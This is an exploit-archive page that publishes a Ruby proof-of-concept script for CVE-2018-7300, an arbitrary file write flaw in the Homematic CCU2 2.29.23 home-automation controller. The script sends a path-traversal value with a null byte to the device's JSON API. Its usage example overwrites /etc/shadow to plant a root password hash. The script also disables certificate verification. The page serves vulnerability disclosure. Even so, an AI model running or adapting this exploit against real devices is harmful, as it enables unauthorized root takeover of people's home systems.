Homematic CCU2 2.29.23 Arbitrary File Write

Homematic CCU2 2.29.23 Arbitrary File Write: Posted Mar 31, 2018; Authored by Patrick Muench, Gregor Kopf; Homematic CCU2 version 2.29.23 suffers from an arbitrary file write vulnerability.; tags | exploit, arbitrary; advisories | CVE-2018-7300; SHA-256 | dd409c7f1b228ba72e9d1b5031af8e53c65f1eacf0f69e50abd6527af29fc5a5; Download | Favorite | View

Homematic CCU2 2.29.23 Arbitrary File Write

#!/usr/bin/ruby
 
# Exploit Title: Homematic CCU2 Arbitrary File Write
# Date: 28-03-18
# Exploit Author: Patrick Muench, Gregor Kopf
# Vendor Homepage: http://www.eq-3.de
# Software Link: http://www.eq-3.de/service/downloads.html?id=268
# Version: 2.29.23
# CVE : 2018-7300
 
# Description: http://atomic111.github.io/article/homematic-ccu2-filewrite
 
require 'net/http'
require 'net/https'
require 'uri'
require 'json'
 
unless ARGV.length == 3
  STDOUT.puts <<-EOF
Please provide url
 
Usage:
  write_files.rb <ip.adress> <file path> <content of the file>
 
Example:
  write_files.rb https://192.168.1.1 '/etc/shadow' 'root:$1$DsoAgNYx$BSSQ9cLv0DLLknpqztgdd/:19087:0:99999:7:::'
 
  or
 
  write_files.rb http://192.168.1.1 '/etc/shadow' 'root:$1$DsoAgNYx$BSSQ9cLv0DLLknpqztgdd/:19087:0:99999:7:::'
 
EOF
  exit
end
 
# The first argument specifiee the URL and if http or https is used
url = ARGV[0] + "/api/homematic.cgi"
 
# The second argument specifies the file into which the content should be written
homematic_file_path = ARGV[1]
 
# The third argument specifies the content of the file
homematic_file_content = ARGV[2]
 
# define the json body for the attack
body = {
        "version": "1.1",
        "method": "User.setLanguage",
        "params": {
                    "userName": "file path",
                    "userLang": "file content"
                  }
        }.to_hash
 
# define the traversal with the file you want to write
body[:params][:userName] = "../../../../../../../.." + homematic_file_path + "\u0000"
 
# define the content
body[:params][:userLang] = homematic_file_content
 
# split the uri to access it in a easier way
uri = URI.parse(url)
 
# define target connection, disabling certificate verification
Net::HTTP.start(uri.host, uri.port, :use_ssl => uri.scheme == 'https', :verify_mode => OpenSSL::SSL::VERIFY_NONE) do |http|
 
  # define post request
  request = Net::HTTP::Post.new(uri.request_uri)
 
  # define the content type of the http request
  request.content_type = 'application/json'
 
  # define the request body
  request.body = body.to_json
 
  # send the request to the homematic ccu2
  response = http.request(request)
 
  # print response message code and status to cli
  puts 'Response code: ' + response.code + ' ' + response.message
end

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Homematic CCU2 2.29.23 Arbitrary File Write

Homematic CCU2 2.29.23 Arbitrary File Write

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Homematic CCU2 2.29.23 Arbitrary File Write

Share This

Homematic CCU2 2.29.23 Arbitrary File Write

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems